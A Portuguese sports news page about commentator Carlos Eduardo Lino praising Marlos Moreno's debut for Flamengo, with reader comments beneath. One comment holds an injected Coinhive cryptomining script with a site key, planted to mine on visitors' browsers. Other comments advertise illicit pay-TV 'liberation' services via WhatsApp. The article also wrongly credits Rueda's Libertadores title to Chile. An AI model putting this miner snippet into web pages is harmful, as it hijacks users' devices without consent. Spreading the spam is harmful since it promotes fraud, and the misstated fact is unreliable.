"Talvez seja o maior legado de Rueda", diz Lino após estreia de Marlos no Fla

29/1/2018 10:00

"Talvez seja o maior legado de Rueda", diz Lino após estreia de Marlos no Fla

Comentarista do SporTV elogia o novo atacante rubro-negro, que chega ao clube por indicação do ex-técnico, hoje no Chile: "Bola, esse moleque tem muita"

Talvez seja o maior legado de Rueda, diz Lino após estreia de Marlos no Fla
Foto: Divulgação Flamengo

O Flamengo empatou com o Vasco por 0 a 0 no Maracanã, neste sábado, mas se mantém líder do Grupo A da Taça Guanabara e está muito perto da classificação para a semifinal. A partida marcou ainda a estreia de Marlos, emprestado ao Rubro-Negro pelo Manchester City.



O atacante colombiano chegou por indicação do técnico Reinaldo Rueda, que trocou o clube da Gávea pela seleção do Chile, com quem foi campeão da Libertadores em 2016. Na opinião do comentarista Carlos Eduardo Lino, o atacante foi o principal "legado" do treinador colombiano para o Flamengo.

- Ele é bom jogador, é surpreendente que o City não tenha conseguido dar rodagem para ele, mesmo dentro da Europa, e ele tenha vindo para o Flamengo. Talvez seja o maior legado do Rueda a contratação desse menino. Ele é excelente jogador, joga por dentro, pelos lados do campo, na armação, é muito versátil. É muito tímido, introvertido, é um jogador de uma personalidade difícil de ser administrada, porque ele aparentemente está abatido o tempo inteiro. Mas é bom de bola - disse o comentarista, no "Troca de Passes".

Carlos Eduardo Lino acredita que Marlos pode ser usado em várias posições no ataque do Flamengo e ainda que possui um talento acima da média.

- É um jogador adaptável, você pode usar em vários posicionamentos, com várias estratégias de jogo. Ele puxa contra-ataque, é um bom tocador de bola, é um dos jogadores mais promissores do futebol colombiano. Foi o grande destaque entre os jovens nas duas temporadas que esteve lá, até ir para o City. Você batia o olho nele, em várias transmissões do Atlético Nacional tive o prazer de dizer isso, que a gente está vendo um talento surgir, um talento acima da média, para se destacar na América do Sul e brilhar mundo afora.

Depois de se destacar no Atlético Nacional e ser campeão da Libertadores, Marlos foi contratado pelo Manchester City. Depois, foi emprestado para La Coruña e Girona, ambos da Espanha, mas deixou as duas equipes sem fazer nenhum gol.

Para Carlos Eduardo Lino, a personalidade tímida do colombiano ainda pode ter sido o motivo para o jogador não ter se firmado na Europa. Mas garante que Marlos tem qualidade para se destacar no Flamengo.

- O que aconteceu com ele, tem gente que explica pela personalidade dele, pelo fato de ser introvertido, por não ter conseguido se adaptar. Ele também foi para um degrau muito alto, a "perninha" dele não alcançou o City. O Gabriel Jesus está conseguindo alcançar, mas sofre também. Não é fácil entrar em um elenco com aquele nível de qualificação. Principalmente com a exigência mental do trabalho de um Guardiola, que te exige muito mais o caráter intelectual, a compreensão do jogo, às vezes, que a qualidade de bola. Bola, esse moleque tem muita.

No próximo domingo, o Flamengo enfrenta o Nova Iguaçu em Brasília, no estádio Mané Garrincha. O Rubro-Negro se classifica para a semifinal com um empate.

4623 visitas - Fonte: SporTV


VEJA TAMBÉM
- FLAMENGO SONHOU COM NEYMAR?! bastidores revelam conversa e entrave milionário
- amengo inscreve 50 jogadores para a Libertadores 2026 com forte presença da base
- Flamengo estreia na Libertadores com meio-campo reserva contra o Cusco



Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




RUEDA UM MAL DESNECESSÁRIO AO FLAMENGO. UM MAL CARÁTER MERCENÁRIO.

o pouco que ele jogou ele tem futuro

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

não tem jeito com esses laterais só jesus

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Já que Paquetá é um jogador versátil, poderia até ser testado na lateral esquerda ou até mesmo de volante junto com Ronaldo.

Só uma correção, Flamengo mão está próximo de conquistar a vaga para semifinal, ele já está classificado e em primeiro.
Quanto a estreia de Marlos, gostei muito, deu mobilidade ao time.
Vinicius, Moreno e Lincoln na frente castigando a defesa adversária, Diego na armação, Ronaldo e Jonas na ligação da defesa com o ataque. Taí a base do time pra Libertadores. Só as laterais que não tem jeito. Falta reforços pro setor.

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.
publicidade